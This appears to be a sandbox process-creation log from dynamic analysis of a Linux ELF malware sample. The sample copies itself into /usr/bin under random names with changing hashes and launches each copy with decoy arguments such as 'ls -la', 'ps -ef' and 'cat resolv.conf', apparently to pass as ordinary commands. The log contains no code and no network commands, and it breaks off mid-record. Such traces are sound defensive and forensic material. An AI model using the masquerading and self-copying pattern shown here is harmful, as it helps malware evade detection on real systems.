                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:06
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/uhjkqkcgma
                                                                              Arguments:/usr/bin/uhjkqkcgma "cat resolv.conf" 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:9d2be3b2e820cf7206aad0dc28d827dd

                                                                              Start time (UTC):14:29:06
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/uhjkqkcgma
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:9d2be3b2e820cf7206aad0dc28d827dd

                                                                              Start time (UTC):14:29:11
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:11
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:11
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/ksagqhmoao
                                                                              Arguments:/usr/bin/ksagqhmoao pwd 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:c2be7f6f3d8a2dd22bb027877353c35f

                                                                              Start time (UTC):14:29:11
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/ksagqhmoao
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:c2be7f6f3d8a2dd22bb027877353c35f

                                                                              Start time (UTC):14:29:11
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:11
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:11
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/ksagqhmoao
                                                                              Arguments:/usr/bin/ksagqhmoao "ls -la" 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:c2be7f6f3d8a2dd22bb027877353c35f

                                                                              Start time (UTC):14:29:12
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/ksagqhmoao
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:c2be7f6f3d8a2dd22bb027877353c35f

                                                                              Start time (UTC):14:29:11
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:12
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:12
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/ksagqhmoao
                                                                              Arguments:/usr/bin/ksagqhmoao "sleep 1" 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:c2be7f6f3d8a2dd22bb027877353c35f

                                                                              Start time (UTC):14:29:12
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/ksagqhmoao
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:c2be7f6f3d8a2dd22bb027877353c35f

                                                                              Start time (UTC):14:29:12
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:12
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:12
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/ksagqhmoao
                                                                              Arguments:/usr/bin/ksagqhmoao "ls -la" 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:c2be7f6f3d8a2dd22bb027877353c35f

                                                                              Start time (UTC):14:29:12
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/ksagqhmoao
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:c2be7f6f3d8a2dd22bb027877353c35f

                                                                              Start time (UTC):14:29:12
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:12
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:12
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/ksagqhmoao
                                                                              Arguments:/usr/bin/ksagqhmoao "ls -la" 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:c2be7f6f3d8a2dd22bb027877353c35f

                                                                              Start time (UTC):14:29:12
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/ksagqhmoao
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:c2be7f6f3d8a2dd22bb027877353c35f

                                                                              Start time (UTC):14:29:17
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:17
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:17
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/snluqxjnyb
                                                                              Arguments:/usr/bin/snluqxjnyb "netstat -an" 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:b711ff9d714c1e77683e9a8cda370270

                                                                              Start time (UTC):14:29:17
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/snluqxjnyb
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:b711ff9d714c1e77683e9a8cda370270

                                                                              Start time (UTC):14:29:17
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:17
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:17
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/snluqxjnyb
                                                                              Arguments:/usr/bin/snluqxjnyb "sleep 1" 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:b711ff9d714c1e77683e9a8cda370270

                                                                              Start time (UTC):14:29:17
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/snluqxjnyb
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:b711ff9d714c1e77683e9a8cda370270

                                                                              Start time (UTC):14:29:17
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:17
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:17
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/snluqxjnyb
                                                                              Arguments:/usr/bin/snluqxjnyb "cd /etc" 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:b711ff9d714c1e77683e9a8cda370270

                                                                              Start time (UTC):14:29:17
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/snluqxjnyb
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:b711ff9d714c1e77683e9a8cda370270

                                                                              Start time (UTC):14:29:17
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:17
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:17
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/snluqxjnyb
                                                                              Arguments:/usr/bin/snluqxjnyb "grep \"A\"" 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:b711ff9d714c1e77683e9a8cda370270

                                                                              Start time (UTC):14:29:17
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/snluqxjnyb
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:b711ff9d714c1e77683e9a8cda370270

                                                                              Start time (UTC):14:29:17
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:17
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:17
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/snluqxjnyb
                                                                              Arguments:/usr/bin/snluqxjnyb top 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:b711ff9d714c1e77683e9a8cda370270

                                                                              Start time (UTC):14:29:17
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/snluqxjnyb
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:b711ff9d714c1e77683e9a8cda370270

                                                                              Start time (UTC):14:29:22
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:22
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:22
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/rfdcbxuezd
                                                                              Arguments:/usr/bin/rfdcbxuezd "ps -ef" 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:bcf7ec16fced4436fe9502643e9c86a8

                                                                              Start time (UTC):14:29:22
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/rfdcbxuezd
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:bcf7ec16fced4436fe9502643e9c86a8

                                                                              Start time (UTC):14:29:22
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:22
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:22
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/rfdcbxuezd
                                                                              Arguments:/usr/bin/rfdcbxuezd "cat resolv.conf" 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:bcf7ec16fced4436fe9502643e9c86a8

                                                                              Start time (UTC):14:29:22
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/rfdcbxuezd
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:bcf7ec16fced4436fe9502643e9c86a8

                                                                              Start time (UTC):14:29:22
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:22
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:22
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/rfdcbxuezd
                                                                              Arguments:/usr/bin/rfdcbxuezd "cd /etc" 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:bcf7ec16fced4436fe9502643e9c86a8

                                                                              Start time (UTC):14:29:23
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/rfdcbxuezd
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:bcf7ec16fced4436fe9502643e9c86a8

                                                                              Start time (UTC):14:29:22
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:22
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:22
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/rfdcbxuezd
                                                                              Arguments:/usr/bin/rfdcbxuezd "cd /etc" 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:bcf7ec16fced4436fe9502643e9c86a8

                                                                              Start time (UTC):14:29:23
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/rfdcbxuezd
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:bcf7ec16fced4436fe9502643e9c86a8

                                                                              Start time (UTC):14:29:23
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:23
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:23
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/rfdcbxuezd
                                                                              Arguments:/usr/bin/rfdcbxuezd id 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:bcf7ec16fced4436fe9502643e9c86a8

                                                                              Start time (UTC):14:29:23
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/rfdcbxuezd
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:bcf7ec16fced4436fe9502643e9c86a8

                                                                              Start time (UTC):14:29:28
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:28
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:28
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/nqjbkvhncc
                                                                              Arguments:/usr/bin/nqjbkvhncc "cat resolv.conf" 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:19502630540ed5c815ecc4fe6cd2d733

                                                                              Start time (UTC):14:29:28
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/nqjbkvhncc
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:19502630540ed5c815ecc4fe6cd2d733

                                                                              Start time (UTC):14:29:28
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:28
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:28
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/nqjbkvhncc
                                                                              Arguments:/usr/bin/nqjbkvhncc "sleep 1" 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:19502630540ed5c815ecc4fe6cd2d733

                                                                              Start time (UTC):14:29:28
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/nqjbkvhncc
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:19502630540ed5c815ecc4fe6cd2d733

                                                                              Start time (UTC):14:29:28
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:28
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:28
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/nqjbkvhncc
                                                                              Arguments:/usr/bin/nqjbkvhncc gnome-terminal 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:19502630540ed5c815ecc4fe6cd2d733

                                                                              Start time (UTC):14:29:28
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/nqjbkvhncc
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:19502630540ed5c815ecc4fe6cd2d733

                                                                              Start time (UTC):14:29:28
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:28
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:28
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/nqjbkvhncc
                                                                              Arguments:/usr/bin/nqjbkvhncc gnome-terminal 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:19502630540ed5c815ecc4fe6cd2d733

                                                                              Start time (UTC):14:29:28
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/nqjbkvhncc
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:19502630540ed5c815ecc4fe6cd2d733

                                                                              Start time (UTC):14:29:28
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:28
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:28
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/nqjbkvhncc
                                                                              Arguments:/usr/bin/nqjbkvhncc ifconfig 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:19502630540ed5c815ecc4fe6cd2d733

                                                                              Start time (UTC):14:29:28
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/nqjbkvhncc
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:19502630540ed5c815ecc4fe6cd2d733

                                                                              Start time (UTC):14:29:33
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:33
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:33
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/xzmsvqaqiz
                                                                              Arguments:/usr/bin/xzmsvqaqiz "ls -la" 6261
                                                                              File size:548660 bytes
                                                                              MD5 hash:9f80890f560ed6066115f1895d821440

                                                                              Start time (UTC):14:29:33
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/xzmsvqaqiz
                                                                              Arguments:-
                                                                              File size:548660 bytes
                                                                              MD5 hash:9f80890f560ed6066115f1895d821440

                                                                              Start time (UTC):14:29:33
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:33
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:33
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/xzmsvqaqiz
                                                                              Arguments:/usr/bin/xzmsvqaqiz "sleep 1" 6261
                                                                              File size:548660 bytes
                                                                              MD5 hash:9f80890f560ed6066115f1895d821440

                                                                              Start time (UTC):14:29:33
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/xzmsvqaqiz
                                                                              Arguments:-
                                                                              File size:548660 bytes
                                                                              MD5 hash:9f80890f560ed6066115f1895d821440

                                                                              Start time (UTC):14:29:33
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:33
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:33
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/xzmsvqaqiz
                                                                              Arguments:/usr/bin/xzmsvqaqiz "ps -ef" 6261
                                                                              File size:548660 bytes
                                                                              MD5 hash:9f80890f560ed6066115f1895d821440

                                                                              Start time (UTC):14:29:33
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/xzmsvqaqiz
                                                                              Arguments:-
                                                                              File size:548660 bytes
                                                                              MD5 hash:9f80890f560ed6066115f1895d821440

                                                                              Start time (UTC):14:29:33
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:33
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:33
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/xzmsvqaqiz
                                                                              Arguments:/usr/bin/xzmsvqaqiz "grep \"A\"" 6261
                                                                              File size:548660 bytes
                                                                              MD5 hash:9f80890f560ed6066115f1895d821440

                                                                              Start time (UTC):14:29:33
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/xzmsvqaqiz
                                                                              Arguments:-
                                                                              File size:548660 bytes
                                                                              MD5 hash:9f80890f560ed6066115f1895d821440

                                                                              Start time (UTC):14:29:33
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:33
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:33
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/xzmsvqaqiz
                                                                              Arguments:/usr/bin/xzmsvqaqiz ifconfig 6261
                                                                              File size:548660 bytes
                                                                              MD5 hash:9f80890f560ed6066115f1895d821440

                                                                              Start time (UTC):14:29:33
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/xzmsvqaqiz
                                                                              Arguments:-
                                                                              File size:548660 bytes
                                                                              MD5 hash:9f80890f560ed6066115f1895d821440

                                                                              Start time (UTC):14:29:38
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:38
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:38
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/bbdupdfrbl
                                                                              Arguments:/usr/bin/bbdupdfrbl "ifconfig eth0" 6261
                                                                              File size:548660 bytes
                                                                              MD5 hash:ce8ed5c0103d476aae51c2e02825f9cd

                                                                              Start time (UTC):14:29:38
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/bbdupdfrbl
                                                                              Arguments:-
                                                                              File size:548660 bytes
                                                                              MD5 hash:ce8ed5c0103d476aae51c2e02825f9cd

                                                                              Start time (UTC):14:29:38
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:38
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:38
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/bbdupdfrbl
                                                                              Arguments:/usr/bin/bbdupdfrbl who 6261
                                                                              File size:548660 bytes
                                                                              MD5 hash:ce8ed5c0103d476aae51c2e02825f9cd

                                                                              Start time (UTC):14:29:38
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/bbdupdfrbl
                                                                              Arguments:-
                                                                              File size:548660 bytes
                                                                              MD5 hash:ce8ed5c0103d476aae51c2e02825f9cd

                                                                              Start time (UTC):14:29:38
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:38
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:38
                                                                              Start date (UTC):03/01/2025
